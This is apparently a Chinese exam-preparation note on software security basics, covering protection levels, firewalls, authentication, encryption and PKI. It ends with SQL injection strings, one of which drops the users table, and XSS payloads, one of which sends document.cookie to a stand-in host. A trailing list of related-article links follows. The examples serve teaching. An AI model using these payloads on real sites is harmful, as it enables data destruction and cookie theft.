软件评测师——安全性基础知识
安全防护体系
七个层次
- 实体安全
- 平台安全
- 数据安全
- 通信安全
- 应用安全
- 运行安全
- 管理安全
安全保护等级(5层,等级渐强)
- 用户自主——用户自己具备自主的安全保护能力,如通过用户、用户组来实现(账户、密码等)
- 系统审计——在用户自主级的基础上增加审计跟踪日志
- 安全标记——在第二级基础上指定了安全标记(划分不同的安全级别,有相应的权限才可进行访问)
- 结构化——在第三级基础上,将安全保护机制划分为关键部分和非关键部分的类别
- 访问验证——增设访问验证功能
数据安全策略
备份和恢复是一种数据安全策略
- 存储设备
磁盘阵列、磁带机(磁带库)、光盘库、SAN设备 - 存储优化
DAS、NAS、SAN - 存储保护
磁盘阵列、双机容错、集群、备份与恢复 - 存储管理
数据库备份与恢复、文件与卷管理、复制、SAN管理
安全防护策略
软件系统对抗攻击的主要手段——安全防护策略
主要策略
- 安全日志——
被动
防护策略(记录行为,不会主动防护) - 入侵检测——防火墙的第二道闸门,
主动
网络安全防护措施 - 隔离防护
——隔离网闸:实现内网和外网的物理隔离
——防火墙:实现内网和外网的逻辑隔离
- 漏洞扫描——使用扫描工具扫描漏洞,是黑客攻击的第一步
防火墙(类型)
包过滤防火墙
- 对用户透明
- 安全控制能力限于
网络层
、传输层
- 不建立链接状态表(一直保持开启),前后报文无关
- 应用层控制弱
状态检测防火墙
- 建立链接状态表者(可以使用动态的端口号,可以随时关闭或开启),前后报文相关
- 应用层控制弱
代理服务防火墙
- 检测一些应用层的安全行为
- 防护等级高,效率低
用户认证机制
访问控制
访问控制的实现方式
- 限制访问系统的
人员
——用户标识与验证(是访问控制的基础,是对用户身份的合法性验证) - 限制进入系统的用户所能做的
操作
——存取控制(限制权限法,隔离技术法)
三种常用的方法
- 要求用户输入一些保密信息
- 采用物理识别设备
- 采用生物统计学系统
身份验证方式
- 用户名/密码方式
- IC卡认证——IC卡硬件不可复制
- 动态密码——按照
时间
或使用次数
不断变化;每个密码只使用一次的技术 USB Key认证
——采用软硬件结合
,一次一密的强双因子验证(解决了安全性与易用性矛盾
)
用户口令保护策略
安全密码(首次登录必须修改口令)
- 密码长度
- 密码有效期
- 密码组成:大写、小写、数字、特殊符号
- 不带联想色彩(电话、生日、地址…)
- 不用完整的单词(常用人名Alice等)
口令保护策略
- 最大口令时效
- 最小口令时效(防止被攻击后别人修改密码,使得管理员丧失管理权)
- 口令历史(设置多久才能允许使用历史密码)
- 最小口令长度
- 口令复杂度
- 加密选项
- 口令锁定
加密技术
对称性加密
加密和解密使用相同的密钥
特点
- 密钥分发困难
- 算法效率高
- 速度快
- 适合于对大数据进行加密
常见对称性算法(私钥加密算法)
- DES 3DES(三重DES)
- RC- 5
- IDEA 国际数据加密算法
非对称性加密
加密和解密使用不同的密钥
特点
- 密钥成对出现
- 密钥之间不能相互推导
- 公钥对外公开
- 私钥只有持有者持有
- 算法相对于对称加密算法效率低
常见非对称算法(公钥加密算法)
- RSA
- ECC椭圆曲线算法
- Elgamal算法
- DSA 数字签名算法
PKI
公钥基础设施——解决公钥归属问题,如A与B通信,PKI确保确实公钥来自于A/B,而不是第三方
- CA ——证书颁发机构,是PKI的核心
- 数字证书——把公钥和拥有者绑定在一起的数字文件
- 证书实现的安全保证——机密性、不可否认性、完整性、鉴别
签名+加密
注:D——解密;E——加密
对未加密的数据进行解密,也是数据变成不可阅读的方式,也可以看做加密
单向加密
非可逆加密
- 就是
不可解密
的加密方法,也称单向加密
常见的单向加密算法
- MD5
SHA
(安全的哈希算法)——无论数据大小,通过哈希算法生成的哈希报文摘要位数固定;数据不同,生成的哈希报文摘要也不同
——等同于签名功能,但是效率比签名高
Hash+签名
网络攻击
网络攻击术语
- 冒充——口令猜测、缓冲区溢出
- 重演(重复演示)
- 消息篡改——伪造电子邮件、DNS高速缓存污染(在高速缓存中修改信息)
服务拒绝
(DOS,DDOS无法正常提供服务)——死亡ping、泪滴攻击、UDP洪水、SYN洪水、Land攻击、Smurf攻击、Fraggle攻击、电子邮件炸弹、畸形信息攻击
病毒防治
计算机病毒
- 病毒:
破坏者
——人为的,可自我复制的
潜伏性、传染性、隐蔽性、破坏性、多样性、条件触发性 - 木马:
盗窃者
不产生图标、伪装成“系统服务”的方式、自动运行、具备自动恢复、能自动开启端口,建立网络连接
计算机病毒与木马
常见安全协议(了解,考察协议之间的关系)
安全协议-SSL
安全协议-HTTPS
SQL注入攻击、XSS攻击(重要!!!)
SQL注入攻击
strSQL= "select * from users where (name = '"+ userName + "')
and (pw = '"+ passWord"');"
strSQL = "select * from users where (name = '1' or '1' = '1') and (pw = '1' or '1'='1');"
strSQL = "select * from users where (name = '张三';drop table users ;-- );"
XSS攻击
- 跨站脚本攻击(Cross Site Scripting)
- 原理:攻击者向有XSS漏洞的网站中输入(或传入)恶意的HTML代码,使得用户浏览该网站是,自动执行这段恶意代码,从而达到攻击的目的。
——如盗取用户cookie
、破坏页面结构
、重定向其他网站
等
http://bbs.xss.net/home?content = <script> alert("xss")</script>
http://www.xss.com?content = <script>window.open("www.xss1.com ?param=" document.cookie)</script>
XSS防御
- 验证所有输入数据,有效检测攻击
- 对所有输出数据进行适当的编码,以防止任何已成功注入的脚本在浏览器端运行
软件评测师——安全性基础知识相关推荐
- 软件评测师——软件工程基础知识2
例题1 软件开发中的瀑布模型典型地刻画了软件生存周期的阶段划分,与其最相适应的软件开发方法是 (1) . (1)A. 构件化方法 B. 结构化方法 C. 面向对象方法 D. 快速原型方法 参考答案:瀑 ...
- 百万调音师—音频基础知识
百万调音师-音频基础知识 音频基本属性 1).音频理论 2).音频格式 3).音频声道 声音如何传输到电脑? 模拟信号 数字信号 脉冲编码调制 1).滤波 2).采样 3).量化 4).编码 分贝 音 ...
- 视频教程-2020年软考信息系统项目管理师考试基础知识(下)新考纲视频培训课程-软考
2020年软考信息系统项目管理师考试基础知识(下)新考纲视频培训课程 10年以上软考培训经验,线下培训学员过万人.培训过的课程有:网络规划设计师.网络工程师.信 息系统项目管理师.系统集成项目管理师. ...
- 华师计算机应用基础知识,华师计算机应用基础课后习题答案.doc
华师计算机应用基础课后习题答案 华师计算机应用基础课后习题答案 华师作业答案 2011年<计算机基础>期末考试复习题 第一章 计算机基础知识 选择题: 1. 目前使用最广泛.发展最快的计算 ...
- 软件评测师-15.信息安全知识与安全测试
15.信息安全知识与安全测试 15.1数据安全策略 15.1.1数据安全的相关概念 15.1.1.1信息安全 信息安全从其本质上来讲就是网络传输处理过程中的信息安全.它涉及的领域相当广泛.这是因为在目 ...
- 信息系统项目管理师论文基础知识
摘要:信息系统项目管理师论文字数,考试时间.论文答题卡及注意事项,科科过给您图文介绍下. 字数要求:信息系统项目管理师论文一般是2000~2500字之间: 考试时间:120分钟: 一.信息系统项目管理 ...
- 软件评测师:数据库知识
一.三级模式结构 模型:对现实世界特征的模拟和抽象 数据模型:对现实世界数据特征的抽象 数据模型的三要素: 数据结构:数据对象存储.组织的集合 数据操作:对数据对象操作的集合 数据的约束条件:数据对象 ...
- 系统校验矩阵怎么求_软考高级架构师:计算机系统基础知识
计算机系统基础 计算机组成 CPU的功能 •(1)程序控制功能.CPU通过执行指令来控制程序的执行顺序. •(2)操作控制. •(3)时间控制. •(4)数据处理.CPU最根本的任务. (1)运算器. ...
- 华师计算机基础知识题库及答案,2014华师《计算机基础》题及答案
资源描述: 1.第1题 数据是信息的载体,它的不同形式有数值.文字.语言.图形和____. A.多媒体 B.表达式 C.函数 D.图像 您的答案D 题目分数2.0 此题得分2.0 2.第2题 以下应用 ...
- 软件评测师 各章节考点汇总(基础知识部分)
目录 计算机系统构成及硬件基础知识 数的表示 逻辑运算 定点数与浮点数 总线 CPU RISC/CISC指令 流水线 存储体系 Cache 寻址方式 校验码 输入/输出 操作系统知识 进程 程序语言基 ...
最新文章
- 基于BERT预训练的中文命名实体识别TensorFlow实现
- 业界资讯: Air 2.0 beta 版本 发布
- 【Android 启动过程】Activity 启动源码分析 ( AMS -> ActivityThread、AMS 线程阶段 二 )
- 纠正一个错误,分布式系统关注点第17篇
- 使用JGroups进行ElasticMQ消息复制
- 程序员工作3年只涨2千,你不知道程序员有多难!
- 以太坊白皮书_以太坊发展历程
- es中的search_type简单理解
- App列表之拖拽ListView(上)
- 掘金小册8折优惠:掌握这些技术,轻松拿offer
- 大数据集群安装02之Hadoop配置
- 砌体的弹性模量计算_砌体弹性模量等参数的取值.doc
- C语言 哲学家就餐问题
- 数组取交集、并集与补集
- QT QMessageBox 按钮文字更改为中文
- 三星在中国一面撤资,一面增资是为何?
- FineReport——登录不到决策系统
- 最简单三级管振荡分析(自由多谐振荡器电路)
- 云服务器修改dns 114,为什么改成114dns就行?
- Citric I 模拟赛心得
热门文章
- 开学季Web渗透测试工程师精英班“第5期”来袭,加入即永久观看!
- 利用PTGui制作全景图并用Pano2VR生成SWF文件
- 2010年中考英语写作高分指导
- 隐藏隧道通信:Socks 隧道
- 打印机主流的指令类型(ESC命令集+CPCL命令集+TSPL命令集)...
- 物联网项目设计 (七) 基于RT-thread的MQTT协议物联网辉光钟
- linux防火墙查看状态firewall、iptable
- python识别图片、PDF识别成文字、表格(包含去除水印) 代码不是最新,可在最下面Gitee地址查看最新代码
- 三星s4 android 5.0 root权限,三星S4(i9500)一键ROOT权限获取+USB驱动
- ov5640摄像头使用心得